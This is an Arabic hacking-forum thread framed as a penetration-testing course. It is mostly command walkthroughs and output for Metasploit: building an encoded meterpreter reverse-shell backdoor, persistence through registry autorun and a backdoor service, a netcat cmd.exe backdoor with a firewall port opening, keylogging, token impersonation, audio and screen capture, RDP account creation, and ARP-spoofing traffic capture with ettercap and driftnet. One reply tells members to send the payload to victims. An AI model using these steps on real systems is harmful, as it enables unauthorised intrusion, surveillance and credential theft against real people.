:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Penteration Testing Training (http://www.vbspiders.com/vb/forumdisplay.php?f=278)
-   -   طريقك لاحتراف penetration testings (http://www.vbspiders.com/vb/showthread.php?t=24163)

punisher77 01-23-2010 11:58 PM
طريقك لاحتراف penetration testings
 
لندخل اولى عالم الهكر الحقيقي و خلونا من الباتشات واحد يقول لا أعرف استعمالها وبعدين يقول أن هكر ,الهكر هو ذلك الانسان الملم بجميع أساليب الجديدة المستخدمة في إختراق الأنظمة

بدأ مشروع ثغراmetasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع ****sploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا… بدأ مشروع ثغراتmetasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذاالمصدر

بعد هذا الشرح نبدأ بتشغيل virtualbox كما في الصورة التالية ومن يريد شرح تنصيب vbox على bt4 سأقوم بعمل شرح فيما بعد لمن يريد ذلك



http://img715.imageshack.us/img715/3219/snapshot1s.png


في البداية سنقوم بعمل باكدور مشفر بمشروع المتسبلويت نذهب إلى مجلد المشروع


يمكن تختار واحدة الرابط

كود:
  ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
كود:
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R |  ./msfencode -c 10 -t exe -o /home/punisher/meter.exe
ننقل الباكدور إلى الألة الافتراضية كما في صورة

http://img190.imageshack.us/img190/1003/snapshot3h.png

نقوم بتشغيل mfscli : واجهة أخرى تعمل من سطر الأوامر لكنها تختلف عن msfconsole بأنها ليست تفاعلية (Interactive) أي أننا لن نحتاج للدخول الى سطر أوامر المشروع وتنفيذ عدة أوامر لاستغلال الثغرة بل نستطيع القيام بذلك بتنفيذ أمر واحد فقط بعد تحديد الخيارات التي نريدها بشكل صحيح وهذا يفيدنا في استخدام المشروع من خلال Bash Script أو أي برنامج آخر
كود:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
http://img715.imageshack.us/img715/9523/snapshot4.png

بعد الاختراق خيارات meterpreter ، run persistence وهذ الخيار مهم يجعل لا نفقد الضحية
وهذه بعض خيارات Maintaining اكسس ولكن استخدمت في شرح :
كود:
run persistence -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where metasploit is listening
    -r <opt>  The IP of the system running ****sploit listening for the connect back

meterpreter > run persistence -A -X -i 60 -p 4444 -r 192.168.0.69
[*] Creating a persistent agent: LHOST=192.168.0.69 LPORT=4444 (interval=60 onboot=true)[*] Persistent agent script is 731282 bytes long[*] Uploaded the persistent agent to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fjBnpFnjnN.vbs[*] Agent executed with PID 1948[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IeDEEiTohfs[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IeDEEiTohfs
http://img191.imageshack.us/img191/8272/snapshot5f.png

Keylogging
كود:
meterpreter > ps
500  MSTask.exe        C:\WINNT\system32\MSTask.exe                           
    528  VMwareService.exe  C:\Program Files\VMwareVMware Tools\VMwareService.exe 
    588  WinMgmt.exe        C:\WINNT\System32\WBEMWinMgmt.exe                     
    664  notepad.exe        C:\WINNT\System32\notepad.exe                         
    724  cmd.exe            C:\WINNT\System32\cmd.exe                             
    768  Explorer.exe      C:\WINNT\Explorer.exe
meterpreter > migrate 768[*] Migrating to 768...[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes..
Meterpreter Backdoor Service
كود:
meterpreter > ps

Process list
============

    PID  ****                Path
    ---  ----                ----
    132  ctfmon.exe          C:\WINDOWS\system32\ctfmon.exe
    176  svchost.exe          C:\WINDOWS\system32\svchost.exe
    440  VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    632  Explorer.EXE        C:\WINDOWS\Explorer.EXE
    796  smss.exe
كود:
  meterpreter > migrate 632
run metsvc -h[*]
OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the service
    -h        This help menu
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)
meterpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...[*]  >> Uploading metsrv.dll...[*]  >> Uploading metsvc-server.exe...[*]  >> Uploading metsvc.exe...[*] Starting the service...[*]      * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >
Interacting with Metsvc

كود:

use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.1.104
RHOST => 192.168.1.104
show options
exploit[*] Starting the payload handler...[*] Started bind handler[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)
ps
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server user****: NT AUTHORITY\SYSTEM
meterpreter >
http://img710.imageshack.us/img710/9804/snapshot16.png
************************************************** ************************************
Persistent Netcat Backdoor

كود:
  upload /tmp/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
execute -f cmd -i
C:\********s and Settings\Jim\My ********s> netsh firewall show opmode
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall show portopening


root@bt4:/pentest/exploits/framework3# nc -v 172.16.104.128 455
كم في صورة نجحنا في فتح بورت 455
http://img193.imageshack.us/img193/5901/snapshot9y.png

Fun with Incognito
كود:
meterpreter > use incognito
meterpreter >help
meterpreter >list_tokens -u
meterpreter >impersonate_token SNEAKS.IN\\Administrator
meterpreter > getuid
meterpreter > execute -f cmd.exe -i -t
C:\WINDOWS\system32>whoami
sound recoreder

كود:
meterpreter >run soundrecorder -h
meterpreter >run soundrecorder -t 10
/root/.msf3/logs/soundrecord/
Enabling Remote Desktop

كود:
run getgui -u hax0r -p gibs0n
rdesktop -u hax0r -p gibs0n 192.168.1.3
كما في صورة

http://img20.imageshack.us/img20/7373/snapshot18.png

screenshot

كود:
meterpreter > ps
meterpreter > migrate 260[*] Migrating to 260...[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot /tmp/moo.bmp[*] Image saved to /tmp/moo.bmp
والأن نذهب إلى التجسس على الشبكة ببرنامج ettercap و-driftnet
فيديو يشرح استخدام برنامج Ettercap مع اضافة remote_browser لعمل arp spoofing والتقاط الروابط التي يتم فتحها بالشبكة مع برنامج Driftnet لعرض الصور التي يقوم المستخدمين بمشاهدته
لتشغيل البرامج نكتب في طرفية الأكواد التالية

كود:
ettercap -T -q -M arp:remote -P remote_browser -i eth0 //

 driftnet -i eth0
http://img714.imageshack.us/img714/4643/snapshot13.png

http://img27.imageshack.us/img27/2756/snapshot14u.png

ملاحظة كل ماهو ملون بالأحمر عبارة عن روابط شكراً الموضوع عملت سريعا لمزيد من الشرح ترك رد
الشرح مطبق على جهازي
مكان النجوم نكتب **** ميتا

data$hack 01-24-2010 03:59 AM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Garwasha 01-24-2010 07:24 AM
موفق بإذن الله ... لك مني أجمل تحية .

ThE BiGeSt JoKeR 01-24-2010 03:01 PM
شكرا لك اخي ..
للمعلوميه ..الاخ شرح على باتش صنعه بالميتاسبلويت .. عن طريق البايلود meterpreter
هذا البايلود قوي جدا .. و يستعمل سطر الاوامر ..
بين الاخ الاوامر التي استعملها في الاختراق .. و طبق على جهازه الشخصي ..
انما على الاعضاء الذين يريدون تطبيق الشرح .. ان يرسلو البايلود الى الضحيه .. << رااجع دروس المجهوول

.............

الى اللقاء

KaLa$nikoV 01-24-2010 04:11 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

Cyber Code 03-01-2010 10:41 PM
مشكووراخي الكريم واصل وإلا الامام

abdellatifai 02-01-2014 12:48 PM
رد: طريقك لاحتراف penetration testings
 
مشكووراخي الكريم واصل وإلا الامام


الساعة الآن 08:17 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0